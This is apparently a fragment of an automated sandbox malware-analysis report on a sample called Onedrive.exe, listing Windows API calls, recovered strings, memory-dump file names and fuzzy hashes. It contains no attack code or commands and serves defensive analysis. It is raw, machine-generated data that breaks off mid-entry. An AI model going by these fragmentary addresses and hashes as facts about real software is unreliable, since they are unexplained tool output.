                                        • Opcode Fuzzy Hash: 611d1cda0b8a6a4730dab94e1e50fdd8b83e19467ea75b13cbd837236330efe6
                                        • Instruction Fuzzy Hash: FB518022A08E86D6EE149F56A550239BAA5FF89FE2F09C038DE1E97755DF3CE4118300
                                        APIs
                                          • Part of subcall function 00007FF6104FA33C: SLOpen.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA37E
                                          • Part of subcall function 00007FF6104FA33C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA5F9
                                          • Part of subcall function 00007FF6104FA33C: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA60D
                                          • Part of subcall function 00007FF6104FA33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA622
                                          • Part of subcall function 00007FF6104FA33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA63C
                                          • Part of subcall function 00007FF6104FA33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA656
                                          • Part of subcall function 00007FF6104FA33C: SLClose.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA670
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA00D
                                        • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA022
                                        • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA036
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Free$HeapLocal$Process$CloseOpen
                                        • String ID: Kernel-ExpirationDate
                                        • API String ID: 3289953759-555650421
                                        • Opcode ID: ec37c195baf8c0247c0ae37d5ff26c1606d082038a14728f8d7ed840f1ddf7a0
                                        • Instruction ID: 8b405a8a2cb35f1336bba749cc6b4b428619efeb378780dc21432cbfa95a6ec9
                                        • Opcode Fuzzy Hash: ec37c195baf8c0247c0ae37d5ff26c1606d082038a14728f8d7ed840f1ddf7a0
                                        • Instruction Fuzzy Hash: 3DB19F36A08F42D6EB21CF29948067D77A9BB49BA4F154139DE4ED7784DF38E8A1C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Frame$Handler3::is$EmptyExceptFac_nodeFac_node::_Handler3::getStateTypesUnwind__except_validate_context_record_guard_icall_checks_enforcedstd::_
                                        • String ID: csm$csm
                                        • API String ID: 1491283442-3733052814
                                        • Opcode ID: 9c47b632ef7cd2abb5942c8bc3ac3151e4cb6ba523e81b1d5f0fbc59ecad3f66
                                        • Instruction ID: 8c875d522458a133c3578f59ab9df3cf4f0f82a1d9cdb491c67edb5394389de0
                                        • Opcode Fuzzy Hash: 9c47b632ef7cd2abb5942c8bc3ac3151e4cb6ba523e81b1d5f0fbc59ecad3f66
                                        • Instruction Fuzzy Hash: 8DB1CA36A0EBC295EB709F96E4803AAB7A1FBC4791F504136DA8D47B99CF2CD445CB40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$("Invalid signal or error", 0)$minkernel\crts\ucrt\src\appcrt\misc\signal.cpp$raise
                                        • API String ID: 0-1223553036
                                        • Opcode ID: e58e9fe811afdfae9308997248f27fe0ad1012204da1e47ecf85e2e0864857f0
                                        • Instruction ID: 6b5e7ca452e2ed421a798f504ea46015457a6735bc19e88efbaedee655da0d49
                                        • Opcode Fuzzy Hash: e58e9fe811afdfae9308997248f27fe0ad1012204da1e47ecf85e2e0864857f0
                                        • Instruction Fuzzy Hash: 09A12A32A0EF8296E7608B55E45036FB7A0FB99784F00443AE68E47B99CF7DE444CB50
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_unique_heap_ptrnew[]
                                        • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$public_stream != nullptr
                                        • API String ID: 1578314805-3092436121
                                        • Opcode ID: fab107f0d01f61d73088b446f29e6a40f7aa2fc2ebc6ab533c8737ae29e49a99
                                        • Instruction ID: cc8c0e1bf0c0429cc957fc4a8ba8fd615dc2fd3264ab3e7983fd9ed42145a9c6
                                        • Opcode Fuzzy Hash: fab107f0d01f61d73088b446f29e6a40f7aa2fc2ebc6ab533c8737ae29e49a99
                                        • Instruction Fuzzy Hash: 0E510922A2BE82A5EB50DB54E4513BA63A8EF947C0F901132E68E477A6DF7CD644C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_$SchedulerScheduler::___crt_unique_heap_ptr$type_info::_name_internal_method$CriticalLock::_ReentrantScoped_lockScoped_lock::~_
                                        • String ID: C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                        • API String ID: 930568095-1635213866
                                        • Opcode ID: c197946b17308473d5385c035a85cd2ffa56f7ec18cff5904e093d1f0731d030
                                        • Instruction ID: 9076986aa92a8abe06a424586ccdcf34818a6716ec4c75d4479b882f296f96fb
                                        • Opcode Fuzzy Hash: c197946b17308473d5385c035a85cd2ffa56f7ec18cff5904e093d1f0731d030
                                        • Instruction Fuzzy Hash: 16611C3261EE82A6EA50DF54E4513ABB3A4FBC4780F504136E6CD86BAADF7CD544CB40
                                        APIs
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031D142
                                          • Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031D202
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __vcrt_lock$CriticalEnterSection
                                        • String ID: %ls$_CrtIsValidHeapPointer(block)$_msize_dbg$block != nullptr$is_block_type_valid(header->_block_use)$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
                                        • API String ID: 3216741998-890774455
                                        • Opcode ID: d2e18c4f5006e9fd8889e5d5fa9a9eef759e1c481ae9fff440f1545f77c3845c
                                        • Instruction ID: ec49a6ed442e47adf40bdf8f0483e0981b1431dd4d1e7f212d45c4cdc400140c
                                        • Opcode Fuzzy Hash: d2e18c4f5006e9fd8889e5d5fa9a9eef759e1c481ae9fff440f1545f77c3845c
                                        • Instruction Fuzzy Hash: A5417E31A1AF43A2EB609B21E48077A77A0FB893D5F401536EA8D4BBD5DF3DE5458700
                                        APIs
                                        • LoadLibraryExW.KERNEL32(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC512
                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC526
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC559
                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC56F
                                        • FreeLibrary.KERNEL32(?,?,?,?,00000000,00007FF6104F288B), ref: 00007FF6104FC5AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Library$AddressErrorFreeHandleLastLoadModuleProc
                                        • String ID: SLpTriggerServiceWorker$SPPC.DLL$syncreeval
                                        • API String ID: 590180482-1899451423
                                        • Opcode ID: 46e5b8ab7ea2b751467af070a34f81cb02269ece383fb26039dd3aadbd22565e
                                        • Instruction ID: c976fd43a1003bd10a86a40652df71348d2a3f36205fe0947fbf881dc911b43f
                                        • Opcode Fuzzy Hash: 46e5b8ab7ea2b751467af070a34f81cb02269ece383fb26039dd3aadbd22565e
                                        • Instruction Fuzzy Hash: 2611AC22B0CF56E6FF045B29AA5017D66A5AF8AFA4B499034CD0EC3754EE3CE4048304
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heapwcsstr$FreeProcess$_wtoi
                                        • String ID:
                                        • API String ID: 3961436675-0
                                        • Opcode ID: 565a0733e25fc3e969219e8b484113a938c3ddbc655a07c7785b9cc9b0e56fb7
                                        • Instruction ID: baede1ed3536ad1e156635d792f3e0bf06b206d491988d86f0c8618afcc1cd64
                                        • Opcode Fuzzy Hash: 565a0733e25fc3e969219e8b484113a938c3ddbc655a07c7785b9cc9b0e56fb7
                                        • Instruction Fuzzy Hash: 1F719022A08E82E6EF109B29A4440BD76A8FFC9FA4F498534DA4EC7795DE3CE515C310
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD688
                                        • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD69C
                                        • wcschr.MSVCRT(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD6B9
                                        • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD7B2
                                        • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD7C6
                                        • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD7F4
                                        • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD808
                                        • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD82F
                                        • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FD843
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess$wcschr
                                        • String ID:
                                        • API String ID: 3583101917-0
                                        • Opcode ID: 185475bb1725aeff1ff69b328b1550321ae0c595b163fea367dc587829107306
                                        • Instruction ID: c08539f340869ff7cbd0568cabb91dcf8ec56b707e7e77fd5af5d2d379d6904d
                                        • Opcode Fuzzy Hash: 185475bb1725aeff1ff69b328b1550321ae0c595b163fea367dc587829107306
                                        • Instruction Fuzzy Hash: 85618422B08E42E6FF10BB2998800BD66EABF45FA4B498435DA5EC7785DF3CE555C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: LicenseState$SL_LICENSING_STATUS_IN_GRACE_PERIOD$SL_LICENSING_STATUS_LICENSED$SL_LICENSING_STATUS_NOTIFICATION$SL_LICENSING_STATUS_UNLICENSED
                                        • API String ID: 2081463915-2812009040
                                        • Opcode ID: cf784307bdb191ea20cf096f8f6de6f8d4d5616a99717e974fa0e9b77618c7be
                                        • Instruction ID: 75efea984ffdb4490fa37755b4ffae408ff9894bc1dbea872b2086f2f1bc466e
                                        • Opcode Fuzzy Hash: cf784307bdb191ea20cf096f8f6de6f8d4d5616a99717e974fa0e9b77618c7be
                                        • Instruction Fuzzy Hash: 04214760A0CE46E6EE548B19A6C02BEA666FB45FE4F449035DA0EC7B48DF3CE4648704
                                        APIs
                                          • Part of subcall function 00007FF8A0332010: memcpy_s.LIBCPMTD ref: 00007FF8A0332061
                                        • Concurrency::details::BoostedObject::IsScheduleGroupSegment.LIBCMTD ref: 00007FF8A0331E59
                                        • Concurrency::details::BoostedObject::IsScheduleGroupSegment.LIBCMTD ref: 00007FF8A0331FD4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: BoostedConcurrency::details::GroupObject::ScheduleSegment$memcpy_s
                                        • String ID: %ls$("unexpected input value; log10 failed", 0)$mantissa_buffer_count > 0$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$quotient < digits_per_iteration_multiplier
                                        • API String ID: 3679209886-1168176157
                                        • Opcode ID: 4325e9b5c20b1b86593e760ec00f5385cf082cd06ed0e168ca7847738c9bb225
                                        • Instruction ID: 03a48bab05c7b0b8c08709a93aa03780b2d2d4e119012eada73658d7fade7b91
                                        • Opcode Fuzzy Hash: 4325e9b5c20b1b86593e760ec00f5385cf082cd06ed0e168ca7847738c9bb225
                                        • Instruction Fuzzy Hash: 72021F3261EAC29AE760DB15E4803ABB7A1FB85780F50513AE78D87B99DF3CD445CB01
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: allocator
                                        • String ID: %ls$("Buffer too small", 0)$buffer != nullptr && buffer_count > 0$common_vsnprintf_s$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                        • API String ID: 3447690668-215146566
                                        • Opcode ID: 8d57fec41b4c742aac83ea82b647f2bd7548b34a8331297ae6f6faa5e1863818
                                        • Instruction ID: 3f8e968668d71437712d4582d7f170eafb1701ba413afcf281f3afc7cc073d15
                                        • Opcode Fuzzy Hash: 8d57fec41b4c742aac83ea82b647f2bd7548b34a8331297ae6f6faa5e1863818
                                        • Instruction Fuzzy Hash: 2E023E3291EE8796EA709F54E4403AAB3A0FB84794F104236E6DE47BD9DF7CD4458B40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: allocator
                                        • String ID: %ls$("Buffer too small", 0)$buffer != nullptr && buffer_count > 0$common_vsnprintf_s$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                        • API String ID: 3447690668-215146566
                                        • Opcode ID: 9ccc0799407a035980ca35a257dbbe8603f8fb4214fbec40f9633d6e023181ab
                                        • Instruction ID: 9e72b19e34baad51f714df27735a84751cf550495b741337e662d244475d53c3
                                        • Opcode Fuzzy Hash: 9ccc0799407a035980ca35a257dbbe8603f8fb4214fbec40f9633d6e023181ab
                                        • Instruction Fuzzy Hash: 88023C3290EE8796EA70DB55E4403AAB3A0FB84394F104236E6DE87BD9DF7CD4458B40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$DirectEventFreeIndex@ProcessSelect@SelectionTouchTransferWrite
                                        • String ID: ChooseRegion$Loading$Number$TollNumber
                                        • API String ID: 4007878856-2571249176
                                        • Opcode ID: 0279151202938e21ffb4fb5d64393771a02b836f32215ccfbddf941e754a0aa0
                                        • Instruction ID: 5d0b749a13361777ebe448ff05fe88e2e640f45c2b03d5603a47b806bad73a64
                                        • Opcode Fuzzy Hash: 0279151202938e21ffb4fb5d64393771a02b836f32215ccfbddf941e754a0aa0
                                        • Instruction Fuzzy Hash: D0714A21B08E43E5EF14DB69D9902BC23A9EF48FA9F409531DA0DC7799DE2CE425C310
                                        APIs
                                        • ?Create@DUIXmlParser@DirectUI@@SAJPEAPEAV12@P6APEAVValue@2@PEBGPEAX@Z2P6AX11H2@Z2@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F9036
                                        • ?SetXMLFromResource@DUIXmlParser@DirectUI@@QEAAJIPEAUHINSTANCE__@@0@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F9060
                                        • ?CreateElement@DUIXmlParser@DirectUI@@QEAAJPEBGPEAVElement@2@1PEAKPEAPEAV32@@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F9099
                                          • Part of subcall function 00007FF6104F66D4: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF6104F675E
                                          • Part of subcall function 00007FF6104F6610: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF6104F66AF
                                        • GetScaleFactor.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F910A
                                        • ?Destroy@DUIXmlParser@DirectUI@@QEAAXXZ.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF6104F91A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DirectParser@$FreeTask$CreateCreate@Destroy@E__@@0@Element@Element@2@1FactorFromResource@ScaleV12@V32@@Value@2@
                                        • String ID: Compliance$ComplianceText
                                        • API String ID: 570248755-1314619677
                                        • Opcode ID: 8b78037bbcabbcbb6045ab8e19150145eef68e87cc9f8055a6f0a411eb7a8557
                                        • Instruction ID: 9d663ca2261100a2c53dec0eabf8bc4a7b5fcd6b6a9a0dd80d65e26daa8a3f5b
                                        • Opcode Fuzzy Hash: 8b78037bbcabbcbb6045ab8e19150145eef68e87cc9f8055a6f0a411eb7a8557
                                        • Instruction Fuzzy Hash: 14711A36B08E42AAFB109F69E5943AD37A5FB48BA8F008435DA0DC6B59DF3CE4558704
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID: ErrorCID
                                        • API String ID: 3859560861-3250631935
                                        • Opcode ID: 87562fb0df644233fc4ef7c3f415d9b073dabda7fb8b5e47c8d9690f725e6cbc
                                        • Instruction ID: 5732e5d7118215eb6802d008b08e42ec60863690867c17a1638515d9001cb3b1
                                        • Opcode Fuzzy Hash: 87562fb0df644233fc4ef7c3f415d9b073dabda7fb8b5e47c8d9690f725e6cbc
                                        • Instruction Fuzzy Hash: 1E513731E08E02E6FF00AB65D5902BD26A9AF89FA8F644435D90ED7759DF3CE4158710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: swprintf
